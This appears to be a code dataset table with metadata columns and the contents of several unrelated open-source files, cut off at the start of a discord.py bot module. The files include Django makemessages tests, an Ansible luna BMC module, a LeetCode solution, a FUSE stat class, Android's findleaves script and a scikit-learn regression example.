repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
ericholscher/django | tests/i18n/commands/extraction.py | 1 | 23225 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import io
import os
import re
import shutil
from unittest import SkipTest
import warnings
from django.core import management
from django.test import SimpleTestCase
from django.utils.encoding import force_text
from django.utils._os import upath
from django.utils import six
from django.utils.six import StringIO
from django.utils.translation import TranslatorCommentWarning
LOCALE = 'de'
class ExtractorTests(SimpleTestCase):
PO_FILE = 'locale/%s/LC_MESSAGES/django.po' % LOCALE
def setUp(self):
self._cwd = os.getcwd()
self.test_dir = os.path.abspath(os.path.dirname(upath(__file__)))
def _rmrf(self, dname):
if os.path.commonprefix([self.test_dir, os.path.abspath(dname)]) != self.test_dir:
return
shutil.rmtree(dname)
def rmfile(self, filepath):
if os.path.exists(filepath):
os.remove(filepath)
def tearDown(self):
os.chdir(self.test_dir)
try:
self._rmrf('locale/%s' % LOCALE)
except OSError:
pass
os.chdir(self._cwd)
def assertMsgId(self, msgid, s, use_quotes=True):
q = '"'
if use_quotes:
msgid = '"%s"' % msgid
q = "'"
needle = 'msgid %s' % msgid
msgid = re.escape(msgid)
return self.assertTrue(re.search('^msgid %s' % msgid, s, re.MULTILINE), 'Could not find %(q)s%(n)s%(q)s in generated PO file' % {'n': needle, 'q': q})
def assertNotMsgId(self, msgid, s, use_quotes=True):
if use_quotes:
msgid = '"%s"' % msgid
msgid = re.escape(msgid)
return self.assertTrue(not re.search('^msgid %s' % msgid, s, re.MULTILINE))
class BasicExtractorTests(ExtractorTests):
def test_comments_extractor(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with io.open(self.PO_FILE, 'r', encoding='utf-8') as fp:
po_contents = fp.read()
self.assertTrue('#. Translators: This comment should be extracted' in po_contents)
self.assertTrue('This comment should not be extracted' not in po_contents)
# Comments in templates
self.assertTrue('#. Translators: Django template comment for translators' in po_contents)
self.assertTrue("#. Translators: Django comment block for translators\n#. string's meaning unveiled" in po_contents)
self.assertTrue('#. Translators: One-line translator comment #1' in po_contents)
self.assertTrue('#. Translators: Two-line translator comment #1\n#. continued here.' in po_contents)
self.assertTrue('#. Translators: One-line translator comment #2' in po_contents)
self.assertTrue('#. Translators: Two-line translator comment #2\n#. continued here.' in po_contents)
self.assertTrue('#. Translators: One-line translator comment #3' in po_contents)
self.assertTrue('#. Translators: Two-line translator comment #3\n#. continued here.' in po_contents)
self.assertTrue('#. Translators: One-line translator comment #4' in po_contents)
self.assertTrue('#. Translators: Two-line translator comment #4\n#. continued here.' in po_contents)
self.assertTrue('#. Translators: One-line translator comment #5 -- with non ASCII characters: áéíóúö' in po_contents)
self.assertTrue('#. Translators: Two-line translator comment #5 -- with non ASCII characters: áéíóúö\n#. continued here.' in po_contents)
def test_templatize_trans_tag(self):
# ticket #11240
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('Literal with a percent symbol at the end %%', po_contents)
self.assertMsgId('Literal with a percent %% symbol in the middle', po_contents)
self.assertMsgId('Completed 50%% of all the tasks', po_contents)
self.assertMsgId('Completed 99%% of all the tasks', po_contents)
self.assertMsgId("Shouldn't double escape this sequence: %% (two percent signs)", po_contents)
self.assertMsgId("Shouldn't double escape this sequence %% either", po_contents)
self.assertMsgId("Looks like a str fmt spec %%s but shouldn't be interpreted as such", po_contents)
self.assertMsgId("Looks like a str fmt spec %% o but shouldn't be interpreted as such", po_contents)
def test_templatize_blocktrans_tag(self):
# ticket #11966
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('I think that 100%% is more that 50%% of anything.', po_contents)
self.assertMsgId('I think that 100%% is more that 50%% of %(obj)s.', po_contents)
self.assertMsgId("Blocktrans extraction shouldn't double escape this: %%, a=%(a)s", po_contents)
def test_force_en_us_locale(self):
"""Value of locale-munging option used by the command is the right one"""
from django.core.management.commands.makemessages import Command
self.assertTrue(Command.leave_locale_alone)
def test_extraction_error(self):
os.chdir(self.test_dir)
self.assertRaises(SyntaxError, management.call_command, 'makemessages', locale=LOCALE, extensions=['tpl'], verbosity=0)
with self.assertRaises(SyntaxError) as context_manager:
management.call_command('makemessages', locale=LOCALE, extensions=['tpl'], verbosity=0)
six.assertRegex(self, str(context_manager.exception),
r'Translation blocks must not include other block tags: blocktrans \(file templates[/\\]template_with_error\.tpl, line 3\)'
)
# Check that the temporary file was cleaned up
self.assertFalse(os.path.exists('./templates/template_with_error.tpl.py'))
def test_unicode_decode_error(self):
os.chdir(self.test_dir)
shutil.copyfile('./not_utf8.sample', './not_utf8.txt')
self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'not_utf8.txt'))
stdout = StringIO()
management.call_command('makemessages', locale=LOCALE, stdout=stdout)
self.assertIn("UnicodeDecodeError: skipped file not_utf8.txt in .",
force_text(stdout.getvalue()))
def test_extraction_warning(self):
"""test xgettext warning about multiple bare interpolation placeholders"""
os.chdir(self.test_dir)
shutil.copyfile('./code.sample', './code_sample.py')
self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'code_sample.py'))
stdout = StringIO()
management.call_command('makemessages', locale=LOCALE, stdout=stdout)
self.assertIn("code_sample.py:4", force_text(stdout.getvalue()))
def test_template_message_context_extractor(self):
"""
Ensure that message contexts are correctly extracted for the
{% trans %} and {% blocktrans %} template tags.
Refs #14806.
"""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
# {% trans %}
self.assertTrue('msgctxt "Special trans context #1"' in po_contents)
self.assertMsgId("Translatable literal #7a", po_contents)
self.assertTrue('msgctxt "Special trans context #2"' in po_contents)
self.assertMsgId("Translatable literal #7b", po_contents)
self.assertTrue('msgctxt "Special trans context #3"' in po_contents)
self.assertMsgId("Translatable literal #7c", po_contents)
# {% blocktrans %}
self.assertTrue('msgctxt "Special blocktrans context #1"' in po_contents)
self.assertMsgId("Translatable literal #8a", po_contents)
self.assertTrue('msgctxt "Special blocktrans context #2"' in po_contents)
self.assertMsgId("Translatable literal #8b-singular", po_contents)
self.assertTrue("Translatable literal #8b-plural" in po_contents)
self.assertTrue('msgctxt "Special blocktrans context #3"' in po_contents)
self.assertMsgId("Translatable literal #8c-singular", po_contents)
self.assertTrue("Translatable literal #8c-plural" in po_contents)
self.assertTrue('msgctxt "Special blocktrans context #4"' in po_contents)
self.assertMsgId("Translatable literal #8d %(a)s", po_contents)
def test_context_in_single_quotes(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
# {% trans %}
self.assertTrue('msgctxt "Context wrapped in double quotes"' in po_contents)
self.assertTrue('msgctxt "Context wrapped in single quotes"' in po_contents)
# {% blocktrans %}
self.assertTrue('msgctxt "Special blocktrans context wrapped in double quotes"' in po_contents)
self.assertTrue('msgctxt "Special blocktrans context wrapped in single quotes"' in po_contents)
def test_template_comments(self):
"""Template comment tags on the same line of other constructs (#19552)"""
os.chdir(self.test_dir)
# Test detection/end user reporting of old, incorrect templates
# translator comments syntax
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter('always')
management.call_command('makemessages', locale=LOCALE, extensions=['thtml'], verbosity=0)
self.assertEqual(len(ws), 3)
for w in ws:
self.assertTrue(issubclass(w.category, TranslatorCommentWarning))
six.assertRegex(self, str(ws[0].message),
r"The translator-targeted comment 'Translators: ignored i18n comment #1' \(file templates[/\\]comments.thtml, line 4\) was ignored, because it wasn't the last item on the line\."
)
six.assertRegex(self, str(ws[1].message),
r"The translator-targeted comment 'Translators: ignored i18n comment #3' \(file templates[/\\]comments.thtml, line 6\) was ignored, because it wasn't the last item on the line\."
)
six.assertRegex(self, str(ws[2].message),
r"The translator-targeted comment 'Translators: ignored i18n comment #4' \(file templates[/\\]comments.thtml, line 8\) was ignored, because it wasn't the last item on the line\."
)
# Now test .po file contents
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('Translatable literal #9a', po_contents)
self.assertFalse('ignored comment #1' in po_contents)
self.assertFalse('Translators: ignored i18n comment #1' in po_contents)
self.assertMsgId("Translatable literal #9b", po_contents)
self.assertFalse('ignored i18n comment #2' in po_contents)
self.assertFalse('ignored comment #2' in po_contents)
self.assertMsgId('Translatable literal #9c', po_contents)
self.assertFalse('ignored comment #3' in po_contents)
self.assertFalse('ignored i18n comment #3' in po_contents)
self.assertMsgId('Translatable literal #9d', po_contents)
self.assertFalse('ignored comment #4' in po_contents)
self.assertMsgId('Translatable literal #9e', po_contents)
self.assertFalse('ignored comment #5' in po_contents)
self.assertFalse('ignored i18n comment #4' in po_contents)
self.assertMsgId('Translatable literal #9f', po_contents)
self.assertTrue('#. Translators: valid i18n comment #5' in po_contents)
self.assertMsgId('Translatable literal #9g', po_contents)
self.assertTrue('#. Translators: valid i18n comment #6' in po_contents)
self.assertMsgId('Translatable literal #9h', po_contents)
self.assertTrue('#. Translators: valid i18n comment #7' in po_contents)
self.assertMsgId('Translatable literal #9i', po_contents)
six.assertRegex(self, po_contents, r'#\..+Translators: valid i18n comment #8')
six.assertRegex(self, po_contents, r'#\..+Translators: valid i18n comment #9')
self.assertMsgId("Translatable literal #9j", po_contents)
class JavascriptExtractorTests(ExtractorTests):
PO_FILE = 'locale/%s/LC_MESSAGES/djangojs.po' % LOCALE
def test_javascript_literals(self):
os.chdir(self.test_dir)
management.call_command('makemessages', domain='djangojs', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = fp.read()
self.assertMsgId('This literal should be included.', po_contents)
self.assertMsgId('This one as well.', po_contents)
self.assertMsgId(r'He said, \"hello\".', po_contents)
self.assertMsgId("okkkk", po_contents)
self.assertMsgId("TEXT", po_contents)
self.assertMsgId("It's at http://example.com", po_contents)
self.assertMsgId("String", po_contents)
self.assertMsgId("/* but this one will be too */ 'cause there is no way of telling...", po_contents)
self.assertMsgId("foo", po_contents)
self.assertMsgId("bar", po_contents)
self.assertMsgId("baz", po_contents)
self.assertMsgId("quz", po_contents)
self.assertMsgId("foobar", po_contents)
class IgnoredExtractorTests(ExtractorTests):
def test_ignore_option(self):
os.chdir(self.test_dir)
ignore_patterns = [
os.path.join('ignore_dir', '*'),
'xxx_*',
]
stdout = StringIO()
management.call_command('makemessages', locale=LOCALE, verbosity=2,
ignore_patterns=ignore_patterns, stdout=stdout)
data = stdout.getvalue()
self.assertTrue("ignoring directory ignore_dir" in data)
self.assertTrue("ignoring file xxx_ignored.html" in data)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = fp.read()
self.assertMsgId('This literal should be included.', po_contents)
self.assertNotMsgId('This should be ignored.', po_contents)
self.assertNotMsgId('This should be ignored too.', po_contents)
class SymlinkExtractorTests(ExtractorTests):
def setUp(self):
self._cwd = os.getcwd()
self.test_dir = os.path.abspath(os.path.dirname(upath(__file__)))
self.symlinked_dir = os.path.join(self.test_dir, 'templates_symlinked')
def tearDown(self):
super(SymlinkExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
os.remove(self.symlinked_dir)
except OSError:
pass
os.chdir(self._cwd)
def test_symlink(self):
# On Python < 3.2 os.symlink() exists only on Unix
if hasattr(os, 'symlink'):
if os.path.exists(self.symlinked_dir):
self.assertTrue(os.path.islink(self.symlinked_dir))
else:
# On Python >= 3.2) os.symlink() exists always but then can
# fail at runtime when user hasn't the needed permissions on
# WIndows versions that support symbolink links (>= 6/Vista).
# See Python issue 9333 (http://bugs.python.org/issue9333).
# Skip the test in that case
try:
os.symlink(os.path.join(self.test_dir, 'templates'), self.symlinked_dir)
except (OSError, NotImplementedError):
raise SkipTest("os.symlink() is available on this OS but can't be used by this user.")
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0, symlinks=True)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This literal should be included.', po_contents)
self.assertTrue('templates_symlinked/test.html' in po_contents)
class CopyPluralFormsExtractorTests(ExtractorTests):
PO_FILE_ES = 'locale/es/LC_MESSAGES/django.po'
def tearDown(self):
super(CopyPluralFormsExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
self._rmrf('locale/es')
except OSError:
pass
os.chdir(self._cwd)
def test_copy_plural_forms(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertTrue('Plural-Forms: nplurals=2; plural=(n != 1)' in po_contents)
def test_override_plural_forms(self):
"""Ticket #20311."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale='es', extensions=['djtpl'], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE_ES))
with io.open(self.PO_FILE_ES, 'r', encoding='utf-8') as fp:
po_contents = fp.read()
found = re.findall(r'^(?P<value>"Plural-Forms.+?\\n")\s*$', po_contents, re.MULTILINE | re.DOTALL)
self.assertEqual(1, len(found))
class NoWrapExtractorTests(ExtractorTests):
def test_no_wrap_enabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0, no_wrap=True)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('This literal should also be included wrapped or not wrapped depending on the use of the --no-wrap option.', po_contents)
def test_no_wrap_disabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0, no_wrap=False)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
self.assertMsgId('""\n"This literal should also be included wrapped or not wrapped depending on the "\n"use of the --no-wrap option."', po_contents, use_quotes=False)
class LocationCommentsTests(ExtractorTests):
def test_no_location_enabled(self):
"""Behavior is correct if --no-location switch is specified. See #16903."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0, no_location=True)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
po_contents = force_text(fp.read())
needle = os.sep.join(['#: templates', 'test.html:55'])
self.assertFalse(needle in po_contents, '"%s" shouldn\'t be in final .po file.' % needle)
def test_no_location_disabled(self):
"""Behavior is correct if --no-location switch isn't specified."""
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0, no_location=False)
self.assertTrue(os.path.exists(self.PO_FILE))
with open(self.PO_FILE, 'r') as fp:
# Standard comment with source file relative path should be present -- #16903
po_contents = force_text(fp.read())
if os.name == 'nt':
# #: .\path\to\file.html:123
cwd_prefix = '%s%s' % (os.curdir, os.sep)
else:
# #: path/to/file.html:123
cwd_prefix = ''
needle = os.sep.join(['#: %stemplates' % cwd_prefix, 'test.html:55'])
self.assertTrue(needle in po_contents, '"%s" not found in final .po file.' % needle)
# #21208 -- Leaky paths in comments on Windows e.g. #: path\to\file.html.py:123
bad_suffix = '.py'
bad_string = 'templates%stest.html%s' % (os.sep, bad_suffix) #
self.assertFalse(bad_string in po_contents, '"%s" shouldn\'t be in final .po file.' % bad_string)
class KeepPotFileExtractorTests(ExtractorTests):
POT_FILE = 'locale/django.pot'
def setUp(self):
super(KeepPotFileExtractorTests, self).setUp()
def tearDown(self):
super(KeepPotFileExtractorTests, self).tearDown()
os.chdir(self.test_dir)
try:
os.unlink(self.POT_FILE)
except OSError:
pass
os.chdir(self._cwd)
def test_keep_pot_disabled_by_default(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0)
self.assertFalse(os.path.exists(self.POT_FILE))
def test_keep_pot_explicitly_disabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0,
keep_pot=False)
self.assertFalse(os.path.exists(self.POT_FILE))
def test_keep_pot_enabled(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=LOCALE, verbosity=0,
keep_pot=True)
self.assertTrue(os.path.exists(self.POT_FILE))
class MultipleLocaleExtractionTests(ExtractorTests):
PO_FILE_PT = 'locale/pt/LC_MESSAGES/django.po'
PO_FILE_DE = 'locale/de/LC_MESSAGES/django.po'
LOCALES = ['pt', 'de', 'ch']
def tearDown(self):
os.chdir(self.test_dir)
for locale in self.LOCALES:
try:
self._rmrf('locale/%s' % locale)
except OSError:
pass
os.chdir(self._cwd)
def test_multiple_locales(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale=['pt', 'de'], verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE_PT))
self.assertTrue(os.path.exists(self.PO_FILE_DE))
def test_comma_separated_locales(self):
os.chdir(self.test_dir)
management.call_command('makemessages', locale='pt,de,ch', verbosity=0)
self.assertTrue(os.path.exists(self.PO_FILE_PT))
self.assertTrue(os.path.exists(self.PO_FILE_DE))
| bsd-3-clause | -4,133,988,649,466,463,700 | 46.861856 | 194 | 0.629949 | false |
dchirikov/luna | contrib/ansible/modules/clustering/luna_bmcsetup.py | 1 | 2793 | #!/usr/bin/python
from ansible.module_utils.basic import AnsibleModule
from ansible.errors import AnsibleError
try:
import luna
except ImportError:
raise AnsibleError("luna is not installed")
from luna_ansible.helpers import StreamStringLogger
import logging
if luna.__version__ != '1.2':
raise AnsibleError("Only luna-1.2 is supported")
def luna_bmcsetup_present(data):
data.pop('state')
name = data.pop('name')
changed = False
ret = True
try:
bmcsetup = luna.BMCSetup(name=name)
except RuntimeError:
args = {}
for key in data:
if data[key] is not None:
args[key] = data[key]
args['name']=name
args['create']=True
bmcsetup = luna.BMCSetup(**args)
changed = True
for key in data:
if data[key] is not None and bmcsetup.get(key) != data[key]:
changed = True
ret &= bmcsetup.set(key, data[key])
return not ret, changed, str(bmcsetup)
def luna_bmcsetup_absent(data):
name = data['name']
try:
bmcsetup = luna.BMCSetup(name=name)
except RuntimeError:
return False, False, name
res = bmcsetup.delete()
return not res, res, name
def main():
log_string = StreamStringLogger()
loghandler = logging.StreamHandler(stream=log_string)
formatter = logging.Formatter('%(levelname)s: %(message)s')
logger = logging.getLogger()
loghandler.setFormatter(formatter)
logger.addHandler(loghandler)
module = AnsibleModule(
argument_spec={
'name': {
'type': 'str', 'required': True},
'user': {
'type': 'str', 'required': False},
'password': {
'type': 'str', 'default': None, 'required': False,
'no_log': True},
'mgmtchannel': {
'type': 'int', 'default': None, 'required': False},
'netchannel': {
'type': 'int', 'default': None, 'required': False},
'userid': {
'type': 'int', 'default': None, 'required': False},
'comment': {
'type': 'str', 'default': None, 'required': False},
'state': {
'type': 'str', 'default': 'present',
'choices': ['present', 'absent']}
}
)
choice_map = {
"present": luna_bmcsetup_present,
"absent": luna_bmcsetup_absent,
}
is_error, has_changed, result = choice_map.get(
module.params['state'])(module.params)
if not is_error:
module.exit_json(changed=has_changed, msg=str(log_string), meta=result)
else:
module.fail_json(changed=has_changed, msg=str(log_string), meta=result)
if __name__ == '__main__':
main()
| gpl-3.0 | -39,312,346,139,698,100 | 26.653465 | 79 | 0.557465 | false |
NSLS-II-XPD/ipython_ophyd | archived/profile_collection-dan/startup/999-load.py | 1 | 1271 | import os
from xpdacq.new_xpdacq.glbl import glbl
from xpdacq.new_xpdacq.beamtimeSetup import (start_xpdacq, _start_beamtime,
_end_beamtime)
from xpdacq.new_xpdacq.beamtime import *
if not glbl._is_simulation:
glbl.area_det = pe1c
glbl.shutter = shctl1
glbl.temp_controller = cs700
# let NameError handle missing object
# beamtime reload happen in xpdacq
from xpdacq.new_xpdacq.xpdacq import *
from xpdacq.new_xpdacq.beamtime import _configure_pe1c
# instantiate prun without beamtime, like bluesky setup
prun = CustomizedRunEngine(None)
prun.md['owner'] = glbl.owner
prun.md['beamline_id'] = glbl.beamline_id
prun.md['group'] = glbl.group
# load beamtime
bt = start_xpdacq()
if bt is not None:
print("INFO: Reload and hook beamtime objects:\n{}\n".format(bt))
prun.beamtime = bt
# gonna seperate analysis from collection
from xpdacq.analysis import *
HOME_DIR = glbl.home
BASE_DIR = glbl.base
YAML_DIR = glbl.yaml_dir
print('INFO: Initializing the XPD data acquisition environment')
if os.path.isdir(HOME_DIR):
os.chdir(HOME_DIR)
else:
os.chdir(BASE_DIR)
print('OK, ready to go. To continue, follow the steps in the xpdAcq')
print('documentation at http://xpdacq.github.io/xpdacq')
| bsd-2-clause | -1,813,804,392,914,363,100 | 27.244444 | 75 | 0.714398 | false |
95subodh/Leetcode | 376. Wiggle Subsequence.py | 1 | 1580 | #A sequence of numbers is called a wiggle sequence if the differences between successive numbers strictly alternate between positive and negative. The first difference (if one exists) may be either positive or negative. A sequence with fewer than two elements is trivially a wiggle sequence.
#
#For example, [1,7,4,9,2,5] is a wiggle sequence because the differences (6,-3,5,-7,3) are alternately positive and negative. In contrast, [1,4,7,2,5] and [1,7,4,5,5] are not wiggle sequences, the first because its first two differences are positive and the second because its last difference is zero.
#
#Given a sequence of integers, return the length of the longest subsequence that is a wiggle sequence. A subsequence is obtained by deleting some number of elements (eventually, also zero) from the original sequence, leaving the remaining elements in their original order.
#
#Examples:
#Input: [1,7,4,9,2,5]
#Output: 6
#The entire sequence is a wiggle sequence.
#
#Input: [1,17,5,10,13,15,10,5,16,8]
#Output: 7
#There are several subsequences that achieve this length. One is [1,17,10,13,10,16,8].
#
#Input: [1,2,3,4,5,6,7,8,9]
#Output: 2
class Solution(object):
def wiggleMaxLength(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
length, direction = 1, None
for i in xrange(1, len(nums)):
if nums[i - 1] < nums[i] and (direction is None or direction is False):
length += 1
direction = True
elif nums[i - 1] > nums[i] and (direction is None or direction is True):
length += 1
direction = False
return length if len(nums)>1 else len(nums) | mit | 877,606,916,788,035,800 | 46.909091 | 301 | 0.724684 | false |
a4a881d4/fs45g | fs45g/fs45gstat.py | 1 | 1031 | import fuse
class fs45gStat(fuse.Stat):
def __init__(self):
self.st_mode = 0
self.st_ino = 0
self.st_dev = 0
self.st_nlink = 0
self.st_uid = 0
self.st_gid = 0
self.st_size = 0
self.st_atime = 0
self.st_mtime = 0
self.st_ctime = 0
class fs45gROStat(fs45gStat):
def __init__(self, clone, uid, gid):
super(fs45gStat,self).__setattr__('st_mode',clone.st_mode)
super(fs45gStat,self).__setattr__('st_ino',clone.st_mode)
super(fs45gStat,self).__setattr__('st_dev',clone.st_dev)
super(fs45gStat,self).__setattr__('st_nlink',clone.st_nlink)
super(fs45gStat,self).__setattr__('st_uid',uid)
super(fs45gStat,self).__setattr__('st_gid',gid)
super(fs45gStat,self).__setattr__('st_size',clone.st_size)
super(fs45gStat,self).__setattr__('st_atime',clone.st_atime)
super(fs45gStat,self).__setattr__('st_mtime',clone.st_mtime)
super(fs45gStat,self).__setattr__('st_ctime',clone.st_ctime)
def __setattr__(self, *args):
raise TypeError("can't modify immutable instance")
__delattr__ = __setattr__
| apache-2.0 | -6,573,624,865,860,555,000 | 31.21875 | 63 | 0.659554 | false |
dAck2cC2/m3e | build_legacy/tools/findleaves.py | 1 | 3628 | #!/usr/bin/env python
#
# Copyright (C) 2009 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Finds files with the specified name under a particular directory, stopping
# the search in a given subdirectory when the file is found.
#
import os
import sys
def perform_find(mindepth, prune, dirlist, filenames):
result = []
pruneleaves = set(map(lambda x: os.path.split(x)[1], prune))
seen = set()
for rootdir in dirlist:
rootdepth = rootdir.count("/")
for root, dirs, files in os.walk(rootdir, followlinks=True):
# prune
check_prune = False
for d in dirs:
if d in pruneleaves:
check_prune = True
break
if check_prune:
i = 0
while i < len(dirs):
if dirs[i] in prune:
del dirs[i]
else:
i += 1
# mindepth
if mindepth > 0:
depth = 1 + root.count("/") - rootdepth
if depth < mindepth:
continue
# match
for filename in filenames:
if filename in files:
result.append(os.path.join(root, filename))
del dirs[:]
# filter out inodes that have already been seen due to symlink loops
i = 0
while i < len(dirs):
st = os.stat(os.path.join(root, dirs[i]))
key = (st.st_dev, st.st_ino)
if key in seen:
del dirs[i]
else:
i += 1
seen.add(key)
return result
def usage():
sys.stderr.write("""Usage: %(progName)s [<options>] [--dir=<dir>] <filenames>
Options:
--mindepth=<mindepth>
Both behave in the same way as their find(1) equivalents.
--prune=<dirname>
Avoids returning results from inside any directory called <dirname>
(e.g., "*/out/*"). May be used multiple times.
--dir=<dir>
Add a directory to search. May be repeated multiple times. For backwards
compatibility, if no --dir argument is provided then all but the last entry
in <filenames> are treated as directories.
""" % {
"progName": os.path.split(sys.argv[0])[1],
})
sys.exit(1)
def main(argv):
mindepth = -1
prune = []
dirlist = []
i=1
while i<len(argv) and len(argv[i])>2 and argv[i][0:2] == "--":
arg = argv[i]
if arg.startswith("--mindepth="):
try:
mindepth = int(arg[len("--mindepth="):])
except ValueError:
usage()
elif arg.startswith("--prune="):
p = arg[len("--prune="):]
if len(p) == 0:
usage()
prune.append(p)
elif arg.startswith("--dir="):
d = arg[len("--dir="):]
if len(p) == 0:
usage()
dirlist.append(d)
else:
usage()
i += 1
if len(dirlist) == 0: # backwards compatibility
if len(argv)-i < 2: # need both <dirlist> and <filename>
usage()
dirlist = argv[i:-1]
filenames = [argv[-1]]
else:
if len(argv)-i < 1: # need <filename>
usage()
filenames = argv[i:]
results = list(set(perform_find(mindepth, prune, dirlist, filenames)))
results.sort()
for r in results:
print r
if __name__ == "__main__":
main(sys.argv)
| apache-2.0 | 5,406,521,903,935,846,000 | 27.566929 | 82 | 0.595645 | false |
NicovincX2/Python-3.5 | Statistiques/Estimation (statistique)/Régression/bay_ridge_OLS.py | 1 | 2049 | # -*- coding: utf-8 -*-
import os
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
from sklearn.linear_model import BayesianRidge, LinearRegression
###############################################################################
# Generating simulated data with Gaussian weigthts
np.random.seed(0)
n_samples, n_features = 100, 100
X = np.random.randn(n_samples, n_features) # Create Gaussian data
# Create weigts with a precision lambda_ of 4.
lambda_ = 4.
w = np.zeros(n_features)
# Only keep 10 weights of interest
relevant_features = np.random.randint(0, n_features, 10)
for i in relevant_features:
w[i] = stats.norm.rvs(loc=0, scale=1. / np.sqrt(lambda_))
# Create noise with a precision alpha of 50.
alpha_ = 50.
noise = stats.norm.rvs(loc=0, scale=1. / np.sqrt(alpha_), size=n_samples)
# Create the target
y = np.dot(X, w) + noise
###############################################################################
# Fit the Bayesian Ridge Regression and an OLS for comparison
clf = BayesianRidge(compute_score=True)
clf.fit(X, y)
ols = LinearRegression()
ols.fit(X, y)
###############################################################################
# Plot true weights, estimated weights and histogram of the weights
plt.figure(figsize=(6, 5))
plt.title("Weights of the model")
plt.plot(clf.coef_, 'b-', label="Bayesian Ridge estimate")
plt.plot(w, 'g-', label="Ground truth")
plt.plot(ols.coef_, 'r--', label="OLS estimate")
plt.xlabel("Features")
plt.ylabel("Values of the weights")
plt.legend(loc="best", prop=dict(size=12))
plt.figure(figsize=(6, 5))
plt.title("Histogram of the weights")
plt.hist(clf.coef_, bins=n_features, log=True)
plt.plot(clf.coef_[relevant_features], 5 * np.ones(len(relevant_features)),
'ro', label="Relevant features")
plt.ylabel("Features")
plt.xlabel("Values of the weights")
plt.legend(loc="lower left")
plt.figure(figsize=(6, 5))
plt.title("Marginal log-likelihood")
plt.plot(clf.scores_)
plt.ylabel("Score")
plt.xlabel("Iterations")
plt.show()
os.system("pause")
| gpl-3.0 | 3,795,073,158,633,134,000 | 31.52381 | 79 | 0.63348 | false |
variablehair/Eggplantato | discord/ext/commands/bot.py | 1 | 26536 | # -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-2017 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
